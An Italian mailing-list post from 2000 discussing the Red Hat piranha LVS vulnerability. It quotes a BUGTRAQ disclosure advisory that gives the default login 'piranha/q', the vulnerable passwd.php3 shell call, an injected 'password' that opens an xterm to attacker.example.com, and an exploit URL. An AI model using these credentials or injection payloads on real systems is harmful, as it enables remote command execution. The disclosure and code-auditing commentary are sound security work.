piranha
Luca Giuzzi
giuzzi a dmf.bs.unicatt.it
Mar 25 Apr 2000 21:28:15 UTC
Includo una copia di un advisory circolato or ora su BUGTRAQ...
forse questo offre piu' dettagli.
Informazioni su piranha in specifico possono essere trovate al seguente URL:
http://www.redhat.com/support/wpapers/piranha/
Sostanzialmente si tratta di un sistema per effettuare load balancing (e HA) fra
servers diversi.
La sigla LVS significa: Linux Virtual Server... informazioni si trovano a:
http://www.redhat.com/support/docs/howto/piranha/
Un commento sulla vulnerabilita', come illustrata qui sotto:
ci sono due problemi...
1) la password/login settata come default...
il problema e' minore (e a questo si riferiva il mio post precedente): la password
andrebbe comunque risettata dopo aver configurato il sistema... altrimenti e' come avere
un account con privilegi amministrativi senza passwd (non root)... mai buona cosa per
una macchina in rete!
2) Un mancato controllo nel modulo che setta la password... questo e' accessibile solo dopo
aver superato il punto (1), cosa che non dovrebbe comunque succedere, ma e' sinonimo di
programmazione poco attenta alla sicurezza... gli stack overflow, l'uso di stringhe `magiche',
etc. sono tecniche standard per compromettere un sistema e cercare di guadagnare i privilegi
di root su di esso... non si tratta di una novita' e, anche se un exploit (come in questo
caso) e' altamente improbabile, esso non deve assolutamente risultare possibile...
in certi casi il code auditing e' essenziale... possibilmente prima dell'integrazione in una
distribuzione [N.B. il problema e' emerso esaminando il codice, non direttamente] ...
Ciao,
lg
> Delivered-To: bugtraq a securityfocus.com
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: Max Vision <vision a WHITEHATS.COM>
> Sender: Bugtraq List <BUGTRAQ a SECURITYFOCUS.COM>
> Subject: piranha default password/exploit
> X-To: bugtraq a securityfocus.com
> To: BUGTRAQ a SECURITYFOCUS.COM
>
> Hi,
>
> In the interest of full disclosure (I used an alias the last few times,
> let's see how this goes as me) here are the details of the piranha
> vulnerability. RE: ISS Security Advisory iss.00-04-24.Piranha
>
> To summarize, piranha is a GUI tool for monitoring, configuring, and
> administering an LVS cluster. The Redhat 6.2 package piranha-0.4.12
> supports web-based php3 interface which is protected by basic
> authentication. A default account is provided, that if known, would allow
> remote users to change the piranha password as well as run arbitrary
> commands on the web server by exploiting a hole in the passwd.php3 script.
>
> First the IDS Signature to detect the attack: http://whitehats.com/IDS/272
>
> (See http://whitehats.com/ids/ for basic information about using
> signatures to detect attacks on your network.)
>
> Now the exploit:
>
> There are basically two problems with the piranha-0.4.12 package, that
> when combined yield shell access for an attacker. The reason earlier
> versions are not vulnerable is because of the shift away from the gui,
> towards a web-based php3 interface.
>
> The first problem is the default account and password that protect the web
> directory containing the administrative php3 scripts. This is what ISS
> called a "backdoor" - which is actually a default password. (If ISS found
> something other than what I found, please email me...)
>
> The default username/password is: piranha/q
>
> Now the ironic part is, the second part of the vulnability lies within the
> program that is used to change the password! By default this is installed
> into /home/httpd/html/piranha/secure as passwd.php3, or:
>
> http://victim.example.com/piranha/secure/passwd.php3
>
> Once you authenticate (see first vulnerability), a form will come up
> asking for the new password. To avoid typo-regret, you must enter the
> password twice. It will then proceed to change the piranha password to
> whatever you provided as the new password. It does this by passing your
> input to a shell command without filtering for metacharacters...
>
> passwd.php3:
> echo "<TD>The passwords you supplied match<BR>";
> $temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
>
> As one can see, this allows for more creative "new passwords", such as
> this one:
>
> g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
>
> Example exploit URL (requires authentication):
> http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
>
> Fix is available for x86 RH 6.2 users at
> ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
>
> --
> Max Vision Network Security <vision a whitehats.com>
> Network Security Assessment http://maxvision.net/
> 100% Success Rate : Penetration Testing & Risk Mitigation
> Free Visibility Analysis and Price Quote for Your Network
>
Maggiori informazioni sulla lista
Lug
|